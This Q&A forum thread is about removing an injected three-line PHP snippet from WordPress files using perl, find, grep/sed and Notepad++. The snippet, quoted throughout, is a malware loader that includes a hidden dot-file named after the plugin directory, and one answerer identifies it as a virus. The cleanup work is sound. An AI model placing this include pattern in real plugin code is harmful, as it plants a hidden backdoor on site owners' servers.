# Search and Remove Lines of Code from all files

Tags: sed, search, replace

I need help and need to search for and remove a 3 line bit of code from all files in a directory.

Code is:

```
if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { 
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); 
}
```

Just needs to be removed not replaced.

Any ideas?

Cheers
Ad

Answer (score 2):

```
perl -0777 -i~ -pe "s{^\\Qif ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { \E\n\Q    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); \E\n}\n}{}m" -- dir/*
```

- `0777` activates the "slurp mode", i.e. it loads the whole file instead of reading it line by line;
- `-i` changes the file "in place", the `~` creates a backup with `~` appended to the name;
- `-p` prints the input after processing;
- the code is just a substitution `s{}{}` but as the whole file is loaded, it operates on three lines;
- the final `m` modifier changes the behaviour of `^`: instead of matching the beginning of the string, it now matches at every line beginning;
- the `\Q...\E` quotes everything in between so you don't have to add backslashes to special characters.

You can combine it with `find` to run in recursively in subdirectories. We need to change the substitution delimiters, though, as `{}` is special in `find -exec`:

```
find /dir -type f -exec perl -i~ -0777 -pe "s<^\\Qif ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { \E\n\Q    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); \E\n}\n><>m" -- {} +
```

Comment: [root@ public_html]# perl -0777 -i~ -pe "s{^\\Qif ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { \E\n\Q    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); \E\n}\n}{}m" -- *
Can't do inplace edit: public_html is not a regular file, <> chunk 3.
Can't do inplace edit: wp-admin is not a regular file, <> chunk 6.
Can't do inplace edit: wp-content is not a regular file, <> chunk 10.
Can't do inplace edit: wp-includes is not a regular file, <> chunk 11.

Comment: Thanks for that kicks back an error.

Comment: You need to provide a list of files, not directories.

Comment: choroba maybe show the OP how to put this in a `find . -type f -exec ... +` block? Also, @AdamGiddens, you can almost certainly ignore the errors, they're just warnings and the command will work for the files it can actually modify which is what you want.

Comment: Can it be recurrsive so it looks through all directories?

Comment: Check the update.

Comment: That runs without error but doesn't remove the 3 lines of code from anywhere. They remain. Any other ideas?

Comment: It works for me. Maybe the lines are different to what you posted? Maybe they contain tabs?

Answer (score 1):

```bsh
find /dir -type f -print0 \
    | xargs -0r grep -Fn "$(cat << 'EOT'
if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { 
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); 
}
EOT
    )" \
    | tac \
    | while IFS=: read -r file_name line_number _; do
        sed -i "${line_number}d" "$file_name" # You can dry run by commenting out this line.
        echo "Removed ${line_number}th line from $file_name"
    done
```

`sed` removes line using line number by `grep`.

- `grep -n`: Shows matched line number.
- `grep -F`: Match fixed strings. It is effective for performance.
- Use `tac` to remove from the backline. It prevents the line number from changing.
- `sed -i "${line_number}d" "$file_name"`: Remove `$line_number` from `$file_name`.

Answer (score 0):

I have the same virus, but I removed the text via Notepad++
with

```
if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {\r\n\x20\x20\x20\x20include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );\r\n}
```

and replacing it with space.

Answer (score 0):

You can remove a line containing PATTERN and the following n lines (2 in your case) with:

```
sed  '/PATTERN/,+2d'
```

A section of the first line as PATTERN should do the job.